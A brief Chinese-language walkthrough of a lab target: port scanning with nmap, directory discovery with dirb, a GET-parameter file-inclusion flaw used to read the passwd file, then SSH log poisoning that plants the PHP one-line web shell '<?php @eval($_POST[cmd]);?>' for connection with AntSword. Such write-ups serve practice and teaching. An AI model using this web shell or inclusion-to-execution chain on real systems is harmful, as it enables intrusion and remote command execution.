1.使用nmap扫描同网段的端口，发现靶机地址

2.访问到主页面，只能看到一个大西红柿

3.再来使用dirb扫面以下有那些目录，发现有一个antibot_image

4.访问我们扫到的地址 ，点金目录里看看有些什么文件

5.看到info.php很熟悉，点进去看看

 

6.查看源代码发现是通过GET方式传参的 ，有文件包含漏洞

7. 利用文件包含漏洞，我们尝试查看一下passwd文件内容，可以成功

 

 8.再来看看日志文件发现记录了ssh登录的登录日志，利用这个机制写入一句话木马

"<?php @eval($_POST[cmd]);?>"@172.16.1.200 -p 2211 

 

9.写入之后使用蚁剑连接